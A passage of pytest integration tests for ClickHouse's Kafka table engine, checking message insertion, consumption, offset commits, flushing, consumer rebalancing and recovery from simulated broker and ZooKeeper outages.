def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka'")) == 1:
time.sleep(1)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:9092", value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
time.sleep(10)
members = describe_consumer_group('virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(120)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
while int(instance.query("SELECT count() FROM test.view")) < 5:
time.sleep(1)
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# print(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() > 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happen during the test; we only need to check the result of the first flush (the part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce('topic_with_multiple_partitions2', messages)
time.sleep(30)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONCURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce('topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
print(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
while int(
instance.query("SELECT count() FROM test.destination WHERE _consumed_by='{}'".format(table_name))) == 0:
print(("Waiting for test.kafka_consumer{} to start consume".format(consumer_index)))
time.sleep(1)
cancel.set()
# I leave the last one working intentionally (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS - 1):
print(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{}'.format(consumer_index))
while int(instance.query(
"SELECT count() FROM system.tables WHERE database='test' AND name='kafka_consumer{}'".format(
consumer_index))) == 1:
time.sleep(1)
# print(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
print(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
print((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
print(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(1200)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(1)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
SELECT * FROM test.kafka LIMIT 1; /* do subscription & assignment in advance (it can take different time, test rely on timing, so can flap otherwise) */
''')
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('no_holes_when_write_suffix_failed', messages)
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(1);
''')
# the tricky part here is that the disconnect should happen after the write prefix, but before the write suffix,
# so I use sleepEachRow
time.sleep(3)
pm.drop_instance_zk_connections(instance)
time.sleep(20)
pm.heal_all()
# connection restored, and it will take a while until the next block is flushed
# it takes years on CI :\
time.sleep(45)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("ZooKeeper session has been expired.: while write prefix to view")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) == 0:
print("Waiting for test.kafka_consumer to start consume")
time.sleep(1)
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('commits_of_unprocessed_messages_on_drop', messages)
time.sleep(1)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(12)
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000;
''')
cancel.set()
time.sleep(15)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
print(result)
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
@pytest.mark.timeout(120)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(300)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(1)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
SELECT * FROM test.kafka LIMIT 1; /* do subscription & assignment in advance (it can take different time, test rely on timing, so can flap otherwise) */
''')
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce('duplicates_when_commit_failed', messages)
instance.query('''
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.5);
''')
# print time.strftime("%m/%d/%Y %H:%M:%S")
time.sleep(3) # MV will work for 10 sec, after that commit should happen, we want to pause before
# print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.pause_container('kafka1')
# that timeout is VERY important, and was picked after a lot of experiments:
# when too low (<30sec) librdkafka will not report any timeout (the alternative is to decrease the default session timeouts for librdkafka)
# when too high (>50sec) the broker will decide to remove us from the consumer group, and will start answering "Broker: Unknown member"
time.sleep(42)
# print time.strftime("%m/%d/%Y %H:%M:%S")
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
# connection restored, and it will take a while until the next block is flushed
# it takes years on CI :\
time.sleep(30)
# as it's a bit tricky to hit the proper moment - let's check in logs if we did it correctly
assert instance.contains_in_log("Local: Waiting for coordinator")
assert instance.contains_in_log("All commit attempts failed")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we reach the end of a partition we will repeat polling until reaching kafka_max_block_size or flush_interval.
# That behavior is a bit questionable - we could just take bigger pauses between polls instead -
# to do more work in a single pass and give the thread more rest.
# But in case of peaky loads on the Kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# Also, we can reach EOF because we drained the librdkafka internal queue too fast.
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce('premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments are done during the select, so it starts sending data to test.destination
# immediately after the MV is created
time.sleep(2)
# produce more messages after delay
kafka_produce('premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
time.sleep(6)
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
@pytest.mark.timeout(180)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce('test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.query("SELECT * FROM test.kafka")
instance.query("SELECT count() FROM test.destination")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination")) < 20000:
print("Waiting for consume")
time.sleep(1)
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
time.sleep(3)
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
@pytest.mark.timeout(180)
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
if __name__ == '__main__':
